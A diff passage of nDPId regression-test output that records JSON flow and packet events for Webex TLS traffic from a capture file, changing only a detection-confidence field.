00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} 
@@ -91,20 +91,20 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} 
@@ -112,36 +112,36 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} 
-00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 